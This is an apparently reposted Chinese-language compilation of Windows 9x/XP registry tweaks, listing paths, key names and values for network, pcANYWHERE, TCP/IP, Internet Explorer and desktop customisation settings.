键值名称:NoNetSetup
数据类型:DWORD
键 值:1
备 注:
作 用:从Netscape 中清除曾到过的网址
路 径:HKEY_CURRENT_USER\Software\Netscape\NetscapeNavigator\URLHistory
键值名称:在右窗格中选择要删除的网址选项
数据类型:
键 值:删除
备 注:
作 用:隐藏"网上邻居"
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer
\Desktop\NameSpace]
键值名称:{208D2C60-3AEA-1069-A2D7-08002B30309D}
数据类型:
键 值:删除
备 注:
作 用:在"我的电脑"中显示"拨号网络"
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer
\MyComputer\NameSpace
键值名称:新建"{992CFFA0-F557-101A-88EC-00DD010CCC48}",在右边的窗口中创建一个字符
串值:"默认"
数据类型:字符串
键 值:值为"拨号网络"。
备 注:
作 用:隐藏"拨号网络"
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer
\MyComputer\NameSpace]
键值名称:{992CFFA0-F557-101A-88EC-00DD010CCC48}
数据类型:
键 值:删除
备 注:
作 用:解决局域网中启动直接登录问题
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network
\Real Mode Net
键值名称:删除AutoLogon
数据类型:
键 值:
备 注:
作 用:找回windows9x启动时的网络口令提示对话框
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\Real Mode Net
键值名称:AutoLogon
数据类型:
键 值:值改为01
备 注:如果没有AutoLogon串,可以新建这个项AutoLogon,并将其值赋为01。
作 用:使拨号网络可以储存密码
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\RealModeNet
键值名称:Autologon
数据类型:Dword
键 值:数值改为 "01 00 00 00 00"
备 注:
作 用:在拨号网络设置中禁止拨入
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network
键值名称:新建"NoDialIn"
数据类型:DWORD
键 值:"键值"框内输入1。
备 注:
作 用:允许网络搜寻的SAP方法
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:IPXUseNBSapMethod
数据类型:
键 值:
备 注:
作 用:网络浏览者(Network Browser)
路 径:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Browser\Parameters
键值名称:IsDomainMaster
数据类型:
键 值:yes,是网络主浏览者(Domain Master Browser)
备 注:
作 用:慢速网络
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Net\0000\
键值名称:SLOWNET
数据类型:
键 值:1
备 注:
作 用:禁止自动登陆到网络服务
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NWNP32\NetworkProvider
键值名称:DisableDefaultPasswords
数据类型:DWORD
键 值:1
备 注:
作 用:指定优先的网络服务
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NWNP32\NetworkProvider
键值名称:AuthenticatingAgent
数据类型:字符串值
键 值:
备 注:
作 用:支持网络服务器上的长文件名
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\NWREDIR
键值名称:SupportLFN
数据类型:DWORD
键 值:1
备 注:
作 用:禁止"网络"选项
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Network
键值名称:NoNetSetup
数据类型:DWORD
键 值:0x1
备 注:
作 用:禁止"整个网络"选项
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Network
键值名称:NoEntireNetwork
数据类型:
键 值:0x1
备 注:
作 用:删除Network Neighborhood文件夹
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\Explorer\ Network Neighborhood
键值名称:NoNetHood
数据类型:
键 值:改为 00 00 00 00
备 注:
作 用:删除Internet Explorer文件夹
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\Explorer\InternetExplorer
键值名称:NoInternetIcon
数据类型:
键 值:改为00 00 00 00
备 注:
作 用:允许TCP/IP远端指定IP地址或机器名
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\Remote Control
键值名称:PromptForTCPIPHost
数据类型:DWORD
键 值:1
备 注:
作 用:TCP/IP请求间隔
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPQueryInterval
数据类型:DWORD
键 值:默认50秒
备 注:
作 用:TCP/IP主机绑定模式
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPHostBindMode
数据类型:
键 值:1,使用默认IP地址
备 注:
作 用:设置TCP/IP数据端口
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPDataPort
数据类型:
键 值:
备 注:
作 用:设置TCP/IP状态端口
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPStatusPort
数据类型:BINARY
键 值:默认1600(HEX)
备 注:
作 用:TCP/IP广播模式
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPNetBroadcast
数据类型:DWORD
键 值:
备 注:
作 用:更改最大的TCP/IP传输单元
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans
键值名称:展开表示TCP/IP协议的那个子键(可以从子健下DriveDesc的值判断,如0000),
在其下新建MaxMTU字符串
数据类型:
键 值:设其值为576
备 注:因为如果MaxMTU大于576,系统传输就需要重新分组,这样就降低了传输效率。windows
默认以太网的标准分组值,为1500
作 用:更改TCP/IP的分组寿命的值
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP
键值名称:DefaultTTL
数据类型:
键 值:修改键值为255
备 注:这主要是防止TCP/IP分组在Internet中被无限复制。Windows 9X的缺省值为32,加大改值,
可使TCP/IP分组通过Internet传输到更远的目的地。
作 用:指定系统默认的邮件客户端软件
路 径:HKEY_CLASSES_ROOT\mailto\shell\open\command
键值名称:"默认"
数据类型:
键 值:输入Netscape或IE的全路径和%1(中间有空格)
备 注:例如"C:\Program Files\Outlook Express\ Msimn.exe" /mailurl:%1或"C:\Program Files
\Netscape\Program\Netscape.exe" %1。
作 用:检查Foxmail是否是系统默认的邮件软件
路 径:HKEY_CURRENT_USER\Software\Aerofox\Foxmail\General
键值名称:CheckMailer
数据类型:
键 值:键值改为1即可检查Foxmail是否为系统默认的邮件软件
备 注:
作 用:取消URL地址的下划线
路 径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\main
键值名称:Ancher Underline
数据类型:
键 值:值改为no
备 注:
作 用:重新找回频道栏
路 径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
键值名称:Show_ChannelBand
数据类型:
键 值:值改为yes
备 注:
作 用:设定"超级链接"处点击前后的颜色
路 径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
键值名称:Anchor Color和Anchor Color Visited
数据类型:
键 值:值分别表示点击前后的颜色,用RGB值表示
备 注:
作 用:收藏夹目录
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
键值名称:Favorites
数据类型:
键 值:
备 注:
作 用:代理服务器地址
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
键值名称:ProxyServer
数据类型:字符串
键 值:
备 注:
作 用:主机登陆处理
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\Host
键值名称:PromptIfLoggedOut
数据类型:DWORD
键 值:1,表示当远端主机处于Windows NT登陆状态且"Prompt()=On Connection" and
"Disconnect On Timeout"都选中时用户不进行连接
备 注:
作 用:继承远端打印模式
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\Remote Control
键值名称:Print
数据类型:DWORD
键 值:0:忽略;1:主机;2:远端;3主机与远端
备 注:
作 用:快速发送文件大小限制
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\File Transfer
键值名称:SpeedSend Minimum Size
数据类型:数值 KB
键 值:-(默认为10)
备 注:
作 用:确认远程文件发送
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\File Transfer
键值名称:ConfirmSend
数据类型:DWORD
键 值:1
备 注:
作 用:确认远程文件删除
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\File Transfer
键值名称:ConfirmDelete
数据类型:DWORD
键 值:1
备 注:
作 用:断开后等候呼叫
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\Host
键值名称:OnlyOneGoodConnectiond
数据类型:DWORD
键 值:0
备 注:
作 用:使用远程计算机名
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\Host
键值名称:ConfirmComputerName
数据类型:DWORD
键 值:1
备 注:
作 用:远端打印等待超时
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\Remote Control
键值名称:PrinterFlushTimeout
数据类型:DWORD
键 值:秒数(默认为30秒)
备 注:
作 用:主机连接超时
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\Remote Control
键值名称:NonPCAHostTimeout
数据类型:DWORD
键 值:秒数(0为永不超时)
备 注:
作 用:Configure Multicast Send and Receive Buffers
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPMcastHostNumRecvBuf, TCPIPMcastHostNumSendBuf, TCPIPMcastRemNumRecvBuf, TCPIPMcastRemNumSendBuf
数据类型:DWORD
键 值:
备 注:
作 用:Configure the Multicast Data Port
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPMcastDataPort
数据类型:BINARY
键 值:默认0x15f
备 注:
作 用:Multicast Adapter Selection
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPMcastInterface
数据类型:DWORD
键 值:
备 注:
作 用:Multicast Error Correction
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPMcastErrorCorrect
数据类型:DWORD
键 值:0,禁止
备 注:
作 用:Multicast Maximum Transmission Unit
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPMcastMTU
数据类型:DWORD
键 值:1400-10,239字节数
备 注:
作 用:Multicast Packet Delay
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPMcastDataDelay
数据类型:DWORD
键 值:毫秒数(0=禁止)
备 注:
作 用:Multicast Winsock Receive Buffer
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPMcastWSRecvBuf
数据类型:DWORD
键 值:字节数,默认8000
备 注:
作 用:-PcANYWHERE第一次启动时运行Smart Setup
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:SmartSetup
数据类型:DWORD
键 值:1
备 注:
作 用:TAPI MODEM错误
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:UseFirstTapiModem
数据类型:DWORD
键 值:
备 注:
作 用:改变串接56K连接速度
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:SerialUse56000
数据类型:DWORD
键 值:1
备 注:
作 用:给浏览包(Browse Packets)增加附加延迟
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPBrowseDelay
数据类型:
键 值:毫秒数
备 注:
作 用:设置Winsock缓冲大小
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPWSDataBuf
数据类型:DWORD
键 值:1-65535字节(默认=8000)
备 注:
作 用:适配器绑定模式
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPHostAdapterMode
数据类型:DWORD
键 值:=0,默认网络适配器;=1,所有的网络适配器
备 注:
作 用:显示主机列表
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:DisplayHostInList
数据类型:DWORD
键 值:1
备 注:
作 用:与底版本的端口兼容性
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPPortCompatibility
数据类型:DWORD
键 值:0,禁止
备 注:
作 用:允许连接未知状态的主机
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPConnectIfUnknown
数据类型:DWORD
键 值:1
作 用:指定主机IP地址
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPHostAddressIndex
数据类型:DWORD
作 用:为一台机器设置两个IP地址
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans
键值名称:可以看到多个名为0000、0001、0002…的目录,它们用于记录协议的安装情况。
在它们中间找到DriverDesc为"TCP/IP"的目录,修改IPAddress和IPMask两个键
键 值:其中IPAddress为用逗号隔开的多个IP地址,IPMask是对应的掩码。
备 注:例如设置IPAddress为"202.10.1.10,202.10.1.25",IPMask为
"255.255.255.0,255.255.255.0"时,表示为系统设置了两个IP地址202.10.1.10 和202.10.1.25。
作 用:禁止SAP advertising
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NcpServer\Parameters
键值名称:Use_Sap
数据类型:字符串值
键 值:1
作 用:更改传输单元接收缓冲区的大小
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP
键值名称:DefaultRcvWindow
键 值:修改键值为6144
备 注:如果DefaultRcvWindow太大,一个分组出错后将导致整个缓冲区的分组数据丢失
并重发,如果太小,将导致分组堵塞,降低速度,最好为512字节的4~12倍。
作 用:MTU自动探测
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP\
键值名称:PMTUDiscovery
键 值:1
作 用:黑洞探测
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP\
键值名称:PMTUBlackHoleDetect
数据类型:
键 值:1
作 用:域名服务器超时
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP\
键值名称:NameSrvQueryTimeout
数据类型:字符串值
作 用:更改Go!Zilla下载完毕的提示声音
路 径:HKEY_CURRENT_USER\AppEvents\Schemes\App\GoZilla\Download Success\.current
键 值:改其"默认"键值为自己喜欢的.wav文件
winxp系统注册表解释大全3(转)
作 用:修改桌面的提示
路 径:HKEY_CLASSES_ROOT\CLSID\相应的ID号,如{20D04FE0-3AEA-1069-A2D8-08002B30309D}
键值名称:InfoTip
键 值:修改内容为你想要的
作 用:在桌面上不显示Win98版本号
路 径:HKEY_CURRENT_USER\Control Panel\desktop
键值名称:PaintDesktopVersion
键 值:修改为0
作 用:锁定桌面和环境变量
路 径:HKEY_CURRENT_USER\SOFTWARE\Micorosoft\Windows\CurrentVersion\Policies\Explorer
键值名称:NoSaveSettings
数据类型:DWORD
键 值:1
作 用:禁止桌面的提示
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
键值名称:ShowInfoTip
键 值:值由1 改为0。
作 用:关闭Active Desktop,还原为传统的桌面
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名称:NoActiveDesktop
键 值:值设为0,可以关闭这些功能;设置为1,可以激活它。
作 用:隐藏在桌面空白处右击鼠标时弹出的上下文菜单
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名称:新建NoViewContextMenu
数据类型:DWORD
键 值:值设为"1"时为有效
作 用:禁用 "设置"菜单中的"活动桌面"选项
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值名称:新建"NoDispCPL"
数据类型:DWORD
键 值:"键值"框内输入1。
作 用:禁止编辑桌面项
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System
\ActiveDesktop
键值名称:NoEditingComponents
数据类型:DWORD
键 值:1
作 用:禁止关闭桌面项
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System
\ActiveDesktop
键值名称:NoClosingComponents
数据类型:DWORD
键 值:1
作 用:禁止删除桌面项
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System
\ActiveDesktop
键值名称:NoDeletingComponents
数据类型:DWORD
键 值:1
作 用:禁止添加桌面项
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System
\ActiveDesktop
键值名称:NoAddingComponents
数据类型:DWORD
键 值:1
作 用:回收站改名字
路 径:HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
键值名称:"默认"
键 值:修改(默认)为你喜欢的名字。
作 用:锁定回收站
路 径:HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\InProcServer32
键值名称:"默认"
键 值:串值后加上"-"符号
备 注:例如原值若为`shell32.dll` 则修改为 `shell32.dll-`
作 用:扩充"回收站"的鼠标右键功能
路 径:HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
键值名称:Attributes
数据类型:DWORD
键 值:40 01 00 20
备 注:以下是相应菜单项对应的值 01 复制 02 剪切 03 复制和剪切 10 重命名 20 删除
30 重命名和删除 40 属性 50 重命名和属性 53 复制、剪切、重命名、属性 60 删除和属性
63 删除、属性、复制、剪切 70 重命名、删除和属性 73 重命名、删除、属性、复制、剪切
作 用:找回"我的电脑"、"回收站"、"收件箱"
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop
\NameSpace
键值名称:新建主键为相应的ID号
作 用:隐藏"回收站"
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\
NameSpace
键值名称:{450d8fba-ad25-11d0-98a8-0800361b1103}
键 值:删除
作 用:我的电脑改名字
路 径:HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
键值名称:"默认"
键 值:修改右边的(默认)为你想要的名字。
作 用:锁定我的电脑
路 径:HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
键值名称:"默认"
键 值:串值后加上"-"符号
备 注:例如原值若为 `shell32.dll` 则修改为 `shell32.dll-`
作 用:双击我的电脑启动资源管理器
路 径:HKEY_CLASSES_ROOT\CLSID\{20DO4FE0-3AEA-1069-A2D8-08002B30309D}\SHELL
键值名称:建open/command/文件夹,默认建名
键 值:值为c:\windows\explorer.exe
|